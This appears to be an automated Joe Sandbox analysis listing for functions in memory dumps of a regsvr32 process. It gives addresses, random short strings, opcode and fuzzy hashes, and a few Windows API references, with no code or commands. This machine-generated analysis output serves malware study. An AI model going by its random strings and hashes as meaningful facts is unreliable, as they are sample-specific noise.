Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 79&$s`~$v;
API String ID: 0-3844292866
Opcode ID: beca5e7b89ed182e00fd219d55149b62bdd99575566975f419d1c5ca8939f9e6
Instruction ID: c39f2861ae99e8b3f2b4a79ea52bf03a0f7a6e48d35fb935a0be7420e121cddb
Opcode Fuzzy Hash: beca5e7b89ed182e00fd219d55149b62bdd99575566975f419d1c5ca8939f9e6
Instruction Fuzzy Hash: 9B61397110478CAFDBFA9E58CC85BDD37A0FB48348F508229E9098B290DF749B4D9B46

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000551C Relevance: 3.9, Strings: 3, Instructions: 127COMMON

Download Yara Rule

Strings

ac, xrefs: 0000000180005543
1_, xrefs: 000000018000579C
wQ_, xrefs: 000000018000561A

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: wQ_$1_$ac
API String ID: 0-1037425278
Opcode ID: 943c7c2c61714b72029a8fd813d6c42c5c92d180aed6d879ae2838ea4b2e708e
Instruction ID: 5ab913ef515fd25bf7fc04ce61f78e9cde1e7d2fd73709943c0f3a5cbb59c84a
Opcode Fuzzy Hash: 943c7c2c61714b72029a8fd813d6c42c5c92d180aed6d879ae2838ea4b2e708e
Instruction Fuzzy Hash: 1D612B7010978C8BDBF8CF54DC997EA3BA6FB54345F208519E84E8A270DB74968CCB42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180023831 Relevance: 3.9, Strings: 3, Instructions: 108COMMON

Download Yara Rule

Strings

)K, xrefs: 000000018002390F
|1-, xrefs: 00000001800238AE
U|, xrefs: 0000000180023A9A

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )K$U|$|1-
API String ID: 0-2543966960
Opcode ID: 5f28dff232c1c58b23d465856644a80aed22efa063cacd8378c131e5813de89a
Instruction ID: 8eb6a9a016547b1518e90ac2546dd564535e4ecbba9ac8d240a0a1c3e9042cf5
Opcode Fuzzy Hash: 5f28dff232c1c58b23d465856644a80aed22efa063cacd8378c131e5813de89a
Instruction Fuzzy Hash: 1151D57160438CAFDBF6CE64D8857CA37A0AB06354F608129A89D8A291DBB4578DCB02

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180029368 Relevance: 3.9, Strings: 3, Instructions: 105COMMON

Download Yara Rule

Strings

H~z, xrefs: 00000001800294EE
6`d, xrefs: 0000000180029414
6|, xrefs: 0000000180029474

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 6|$6`d$H~z
API String ID: 0-1702722476
Opcode ID: 6487df39d46446a395b722702bbc9accbfbbf10f6bdf8a05bf21e92dd4d708c3
Instruction ID: dff368548e7284a50638b46c1e9eca52edd1bdea535486c94ebb7356abcac70e
Opcode Fuzzy Hash: 6487df39d46446a395b722702bbc9accbfbbf10f6bdf8a05bf21e92dd4d708c3
Instruction Fuzzy Hash: C351F37190074DDFCF48DFA4D98A5DEBBB0FB48308F118659E89AA7260C7B89A44CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180019618 Relevance: 3.8, Strings: 3, Instructions: 92COMMON

Download Yara Rule

Strings

t>, xrefs: 0000000180019652
d~, xrefs: 0000000180019780
`5, xrefs: 0000000180019696

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: d~$`5$t>
API String ID: 0-1282322184
Opcode ID: 5ab2e5105061d0cdd7dd2083328b31dc67734e2d6c9a8d2650bd0306db7847c6
Instruction ID: 2b9aad7a7c3990d0f54026c4e2bc5a00c5a3c031faa8fbf8ed0394cc09118e70
Opcode Fuzzy Hash: 5ab2e5105061d0cdd7dd2083328b31dc67734e2d6c9a8d2650bd0306db7847c6
Instruction Fuzzy Hash: 9141B2B190078ECBCF48DFA8C88A1DE7BB0FB58358F104A19E965A6250D3B49664CF84

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000BB28 Relevance: 3.8, Strings: 3, Instructions: 91COMMON

Download Yara Rule

Strings

JYr, xrefs: 000000018000BB50
hmn, xrefs: 000000018000BC20
#St, xrefs: 000000018000BC5D

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #St$JYr$hmn
API String ID: 0-1556749129
Opcode ID: 8c5881788024da3e2945e5a9e10c631b66cff36ab1256063138a18bf82cfdc40
Instruction ID: 771f7f328e054501a5ac5c786693eba7885e85f29817745d48b7f08549072e32
Opcode Fuzzy Hash: 8c5881788024da3e2945e5a9e10c631b66cff36ab1256063138a18bf82cfdc40
Instruction Fuzzy Hash: 9141A2B590038E8FCF48CF68C9865DF7BB0FB58358F104A19E866A6250D3B8D665CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002610 Relevance: 3.8, Strings: 3, Instructions: 87COMMON

Download Yara Rule

Strings

TGA, xrefs: 00000001800026C3
K, xrefs: 000000018000261C
W}, xrefs: 0000000180002698

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: TGA$K$W}
API String ID: 0-588348707
Opcode ID: 6f9a2f9587d8e5dd3523940eb2aee6104e1c9ad2b61c16d7289d24ecd03a1c44
Instruction ID: 925d7415f36b0b7642ffd9188936a5d9ffa2c4cac62ef92b2c466baf2dc1674c
Opcode Fuzzy Hash: 6f9a2f9587d8e5dd3523940eb2aee6104e1c9ad2b61c16d7289d24ecd03a1c44
Instruction Fuzzy Hash: E041C2B480038E8FCB88DF68D8865DE7BB0FB58358F10461DF82AA6254D3B49664CF95

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000738C Relevance: 3.8, Strings: 3, Instructions: 86COMMON

Download Yara Rule

Strings

:1,, xrefs: 0000000180007470
{C=, xrefs: 0000000180007424
@H, xrefs: 00000001800074B7

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: :1,$@H${C=
API String ID: 0-2737386091
Opcode ID: 644fe5c2a8aa80c3bc0818b82038798635fbfb77325ece216352586eb067b324
Instruction ID: ceb57f34bb3f34c1ea772447f295c080a735f780389ac7edd693abfe49cb3e58
Opcode Fuzzy Hash: 644fe5c2a8aa80c3bc0818b82038798635fbfb77325ece216352586eb067b324
Instruction Fuzzy Hash: B641E6B090078E8FCF48DF68C98A5DE7BB0FB58348F104A1DE856A6250D3B4D665CF95

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001481C Relevance: 3.8, Strings: 3, Instructions: 74COMMON

Download Yara Rule

Strings

q<C, xrefs: 000000018001491B
uL , xrefs: 00000001800148B7
prP, xrefs: 00000001800148D3

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: prP$q<C$uL
API String ID: 0-1414207395
Opcode ID: 2ae9b2111e30b1203ae6799d8d29bbb45b968934521661f86bb08c7d67e7e9b2
Instruction ID: cc3a3a13117e67edb5dc9e3fadb8c1066889dae633948d8cd9104a976a047d4b
Opcode Fuzzy Hash: 2ae9b2111e30b1203ae6799d8d29bbb45b968934521661f86bb08c7d67e7e9b2
Instruction Fuzzy Hash: 1031B1B180434E9FCB48DF68C88A5DE7FB0FB58358F10961DE85AA6260D3789695CFC4

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006458 Relevance: 3.8, Strings: 3, Instructions: 61COMMON

Download Yara Rule

Strings

:00D, xrefs: 00000001800064D2
Kl, xrefs: 0000000180006524
(R', xrefs: 00000001800064CE

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: :00D$Kl$(R'
API String ID: 0-3661897330
Opcode ID: 85d3200e76e47dbb67993755bb0ce797b19f94abe7489bd39968e35e8c3a1c76
Instruction ID: 113703a4c5f13be184801d5493027e38acd6d1afb500234bb699672912ccf9eb
Opcode Fuzzy Hash: 85d3200e76e47dbb67993755bb0ce797b19f94abe7489bd39968e35e8c3a1c76
Instruction Fuzzy Hash: CA216F74618B848BD74CDF28C46551EBBE1BB8C718F440B1DF4CAAA354D778D6058B4A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E5944 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00007FF8CB7E597E

Part of subcall function 00007FF8CB7E7FBC: _errno.LIBCMT ref: 00007FF8CB7E7FD4

Part of subcall function 00007FF8CB7E6550: RtlCaptureContext.KERNEL32 ref: 00007FF8CB7E658F
Part of subcall function 00007FF8CB7E6550: IsDebuggerPresent.KERNEL32 ref: 00007FF8CB7E662D
Part of subcall function 00007FF8CB7E6550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8CB7E6637
Part of subcall function 00007FF8CB7E6550: UnhandledExceptionFilter.KERNEL32 ref: 00007FF8CB7E6642
Part of subcall function 00007FF8CB7E6550: GetCurrentProcess.KERNEL32 ref: 00007FF8CB7E6658
Part of subcall function 00007FF8CB7E6550: TerminateProcess.KERNEL32 ref: 00007FF8CB7E6666

Strings

C, xrefs: 00007FF8CB7E59CC

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate_errno_getptd
String ID: C
API String ID: 1583075380-1037565863
Opcode ID: 10b8f8e64b2f2c6b57eebdc268e2529a4342badfac4ad9c6369cf06c32040822
Instruction ID: 98b0a7a8b44ef3add29e2bdcf19d480e8fc9b12bd89dd7a948a303f1562ad68b
Opcode Fuzzy Hash: 10b8f8e64b2f2c6b57eebdc268e2529a4342badfac4ad9c6369cf06c32040822
Instruction Fuzzy Hash: AA516262A18BE64BEB609F2395517BA67A1FF84BC4F448031EE4D47AB9DE3DD805C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7EC6E4 Relevance: 3.1, APIs: 2, Instructions: 64COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00007FF8CB7EC706
GetLocaleInfoA.KERNEL32 ref: 00007FF8CB7EC73B

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: InfoLocale_getptd
String ID:
API String ID: 3731964398-0
Opcode ID: 3ee99f9ceacccca0b475531418f3f0bad8631950249c9606f8709888dfed1ca9
Instruction ID: b6d1849f2352b1c1acd000eac12bb2ae976084851f96b39e9a08d306c72b96c9
Opcode Fuzzy Hash: 3ee99f9ceacccca0b475531418f3f0bad8631950249c9606f8709888dfed1ca9
Instruction Fuzzy Hash: 4D213636B08BC69BEB689E2699453EA73A0FF88785F044135CA1D876B5DF3CE5648600

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7EC2B4 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00007FF8CB7EC2DB
GetLocaleInfoA.KERNEL32 ref: 00007FF8CB7EC310

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: InfoLocale_getptd
String ID:
API String ID: 3731964398-0
Opcode ID: d1cd7d40a2314de2c6ade98052514a7069188fc7bc8d66beba22a864349849c0
Instruction ID: c52545991fbb33244dda578e420ef880326c1834c827bd1a00d21aba24386a77
Opcode Fuzzy Hash: d1cd7d40a2314de2c6ade98052514a7069188fc7bc8d66beba22a864349849c0
Instruction Fuzzy Hash: BD214532A08B959BEB28CF26E8453AAB3A0FB88B80F444135DA5D87764CF2CE5558701

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800264F0 Relevance: 2.8, Strings: 2, Instructions: 299COMMON

Download Yara Rule

Strings

$, xrefs: 000000018002686D
Y}, xrefs: 00000001800265BF

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $$Y}
API String ID: 0-941771097
Opcode ID: ccf5b1dce74faba3fe2a090267a66303c79afc7ef0f7a8852e8ee526979540e5
Instruction ID: b5fbb9b8d69d65623167db00d7c984f611664f17b2ba8ffe1295fa2c65075a94
Opcode Fuzzy Hash: ccf5b1dce74faba3fe2a090267a66303c79afc7ef0f7a8852e8ee526979540e5
Instruction Fuzzy Hash: BFD11771D0475C8BDBA9CFA4C58A6DDBBB0FF48304F14812ED406AA664DBB4A94ACF41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180018148 Relevance: 2.8, Strings: 2, Instructions: 273COMMON

Download Yara Rule

Strings

7;}~, xrefs: 000000018001830E
?C, xrefs: 000000018001823C

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 7;}~$?C
API String ID: 0-2633536567
Opcode ID: 9e9477893eee9c26855422b11b358c2b9c7e89ea64d6e27a9c9a45e4b3e49bc9
Instruction ID: 4ff8dde17651611a765cac66b1fbb421dc2d9ab68fb3aea537ff971927bbf4a2
Opcode Fuzzy Hash: 9e9477893eee9c26855422b11b358c2b9c7e89ea64d6e27a9c9a45e4b3e49bc9
Instruction Fuzzy Hash: 78D1157090074CEBCB98DF28C8CA6DD7FA0FF443A4FA06119FA5696250D7719989CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180025DAC Relevance: 2.8, Strings: 2, Instructions: 272COMMON

Download Yara Rule

Strings

5"*, xrefs: 0000000180025E9D
Wu, xrefs: 0000000180026174

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 5"*$Wu
API String ID: 0-3407213400
Opcode ID: 590a19696181e1204ae7455af11f8a1d001dcd1a3fed74675f5c17178e0ac61d
Instruction ID: 3c96fdf1381a0958c8520d7d71fe6f2c88625533ee613de06fa48a87f48c4e54
Opcode Fuzzy Hash: 590a19696181e1204ae7455af11f8a1d001dcd1a3fed74675f5c17178e0ac61d
Instruction Fuzzy Hash: C5D1347150160CDBCBA9DF38C0896D93BE1FF68314F606229FC26962A6C770D998CB45

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180026B10 Relevance: 2.8, Strings: 2, Instructions: 257COMMON

Download Yara Rule

Strings

F/|, xrefs: 0000000180026ECB
]M, xrefs: 0000000180026CA3

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: F/|$]M
API String ID: 0-4182351379
Opcode ID: 6ca5dc36d9275e72bb52b2201a87e4efd5e3077112f043bed35ba482a866e2ca
Instruction ID: a7a3ffa63f459c2793369717af269d13be5e973408dad35b7fec4159c22d1286
Opcode Fuzzy Hash: 6ca5dc36d9275e72bb52b2201a87e4efd5e3077112f043bed35ba482a866e2ca
Instruction Fuzzy Hash: 93C1FC7590574CCFDBAACF28C4896DA3BE4FF18348F104129FC1A96262C778E959CB46

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180021C3C Relevance: 2.7, Strings: 2, Instructions: 216COMMON

Download Yara Rule

Strings

nK, xrefs: 0000000180021D5B
;SH, xrefs: 0000000180021D77

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ;SH$nK
API String ID: 0-1681473137
Opcode ID: 60009ad1e2a9263792ce168a39eeae7aea84bb316664056338e5cad3c2547986
Instruction ID: 2d779165796623b26e7721dc1da123eca1e5f2af18f65828867eec0b4a65172d
Opcode Fuzzy Hash: 60009ad1e2a9263792ce168a39eeae7aea84bb316664056338e5cad3c2547986
Instruction Fuzzy Hash: A4A1F6B1D047188FDB69DFA9C8896DDBBF0FB58308F20821DE456AB252DB70A945CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800014F8 Relevance: 2.7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

Strings

z, xrefs: 000000018000150B
,, xrefs: 0000000180001690

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ,$z
API String ID: 0-3532108746
Opcode ID: dc10c8488ddee61f5c5f049ba36fdd234a8a1d33d2b4922d6dc47400662f32e6
Instruction ID: 22c424daf7001e4089cf159549a6bd5e686fa177ee3286ce9bb9aa7af20863be
Opcode Fuzzy Hash: dc10c8488ddee61f5c5f049ba36fdd234a8a1d33d2b4922d6dc47400662f32e6
Instruction Fuzzy Hash: D8813B7050064ECFDB99CF28C8967DE3BA0FB58388F214219FC469A251D778DA99CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001A460 Relevance: 2.7, Strings: 2, Instructions: 182COMMON

Download Yara Rule

Strings

g/?, xrefs: 000000018001A61B
~l;, xrefs: 000000018001A543

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: g/?$~l;
API String ID: 0-1448562259
Opcode ID: d2040acbbcff242154b89f912e397b4bdfd0b20ea052fb69228554049ff3a845
Instruction ID: 3fbc9289fec6fa85948f8c66d04cee19a314a674a1b98c47510047b5f8856774
Opcode Fuzzy Hash: d2040acbbcff242154b89f912e397b4bdfd0b20ea052fb69228554049ff3a845
Instruction Fuzzy Hash: BD912570D0871C8BDF98CFA8D4896DEBBF0FB48314F108119E815B6261D7788A49CF69

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000F128 Relevance: 2.7, Strings: 2, Instructions: 173COMMON

Download Yara Rule

Strings

JM, xrefs: 000000018000F3F0
S, xrefs: 000000018000F363

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: JM$S
API String ID: 0-422059844
Opcode ID: 17c06aff4c9a8785a284e06d6c25610082a70a687229394e7dafcb554760f06a
Instruction ID: 18b4f90d7ab76b898621194cab333307634bf3b6742180ea4845374ffda8c285
Opcode Fuzzy Hash: 17c06aff4c9a8785a284e06d6c25610082a70a687229394e7dafcb554760f06a
Instruction Fuzzy Hash: 58813B715047888BDBB8DF34C8863D93BE1FB54348F60821DEC9ACA262DB74954ADB81

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000671C Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

sT>, xrefs: 000000018000694E
\4t, xrefs: 000000018000678D

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: \4t$sT>
API String ID: 0-514966222
Opcode ID: bb5024ce5ec3974a1f347232039341d65ca55b368bc4e02a847ae3966b55dd21
Instruction ID: befa5a9d8a747e28c49f4c6f85c9bef8e8333281f143cc702ee02b151a4c5a7a
Opcode Fuzzy Hash: bb5024ce5ec3974a1f347232039341d65ca55b368bc4e02a847ae3966b55dd21
Instruction Fuzzy Hash: 689178B550070DCFDB98CF28C18A59E3BE8FB49318F40412AFC1E9A264E7B4E519CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800075D4 Relevance: 2.7, Strings: 2, Instructions: 155COMMON

Download Yara Rule

Strings

6 zT, xrefs: 000000018000776A
lh, xrefs: 0000000180007774

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 6 zT$lh
API String ID: 0-3667112246
Opcode ID: 3243651aebf4cc17f9c3ac19081b739ce8b4ee13b4845d7785784d3dcbf37647
Instruction ID: 045a3dc0dd112cd33074149f38d13d5bd37ef25ad135160f9863638738ef0602
Opcode Fuzzy Hash: 3243651aebf4cc17f9c3ac19081b739ce8b4ee13b4845d7785784d3dcbf37647
Instruction Fuzzy Hash: 27811A7050478C8FDBBADF64C8AA7CA7BB0FB59304F504219EA4D8A261DB749749CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800248A8 Relevance: 2.6, Strings: 2, Instructions: 143COMMON

Download Yara Rule

Strings

2Q', xrefs: 0000000180024A93
t<p, xrefs: 00000001800249FD

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 2Q'$t<p
API String ID: 0-2959822804
Opcode ID: b2351d3b708b15bcd3604af59b95d6174f592116e14d9e00cc8b524fb472ed52
Instruction ID: a41fe1ae69e2ef788ca0c35fa62602b5835247be5e9f8fb85ac316e89f41683a
Opcode Fuzzy Hash: b2351d3b708b15bcd3604af59b95d6174f592116e14d9e00cc8b524fb472ed52
Instruction Fuzzy Hash: 30612671D0074E8BDF99DFA9C44A6EEBBB0FB58344F208119E415B7250CB788A49CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180012F28 Relevance: 2.6, Strings: 2, Instructions: 136COMMON

Download Yara Rule

Strings

\`s, xrefs: 000000018001308C
95s, xrefs: 00000001800130A8

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 95s$\`s
API String ID: 0-3495284040
Opcode ID: 588b54260dd6ab6c7a0d8fdad9ba33054619fea491f2d0c2f65b47850ec72611
Instruction ID: 5af2ad2f129eee824c5b1b43ddda8a3f0e9306f12771263eefccbe9bdf0da5be
Opcode Fuzzy Hash: 588b54260dd6ab6c7a0d8fdad9ba33054619fea491f2d0c2f65b47850ec72611
Instruction Fuzzy Hash: 1351D47011478A8BCB48DF28C896ADE3FA1FB58348F114618FC668B264C7B4E665CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001AAB8 Relevance: 2.6, Strings: 2, Instructions: 131COMMON

Download Yara Rule

Strings

qMu, xrefs: 000000018001AB45
3*, xrefs: 000000018001AB25

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 3*$qMu
API String ID: 0-4093015089
Opcode ID: 99b9b50685954fc4be39463e85dd78448f0e0771904def200121889666665086
Instruction ID: 306475205ddf6f42a3ecfe0a1797163739854d195c0d735865f936de0d0f8307
Opcode Fuzzy Hash: 99b9b50685954fc4be39463e85dd78448f0e0771904def200121889666665086
Instruction Fuzzy Hash: 445122B09147189BCB88CFA8E4CA9CDBBF1FF48354F609119F806A7255DB709984CF95

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002C904 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

#X, xrefs: 000000018002C99B
"n&E, xrefs: 000000018002C9F6

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #X$"n&E
API String ID: 0-1188898577
Opcode ID: 718f7bd1d94c81876eaad6eeab3da3c9f3f95e6ba8e740bb3013068cec68a803
Instruction ID: 5f040a851564d75eb680569e00f78a68740ad3a482e782991b4ea7036c242a73
Opcode Fuzzy Hash: 718f7bd1d94c81876eaad6eeab3da3c9f3f95e6ba8e740bb3013068cec68a803
Instruction Fuzzy Hash: 3851CEB190038E8FCB48DF68D8865DE7BB1FB48344F018A1DE866AB250D7B4D665CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800176B8 Relevance: 2.6, Strings: 2, Instructions: 102COMMON

Download Yara Rule

Strings

Bw~, xrefs: 0000000180017803
fy, xrefs: 00000001800176C4

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Bw~$fy
API String ID: 0-1663007907
Opcode ID: e7fa569085818704a3ff5c3485105d547b9a4184ddd82cedce935b50235ecc40
Instruction ID: 54d1d0e0fa6abfe6c6c31828b0edda1727153ea8c56c584fcf89706de6b20d2b
Opcode Fuzzy Hash: e7fa569085818704a3ff5c3485105d547b9a4184ddd82cedce935b50235ecc40
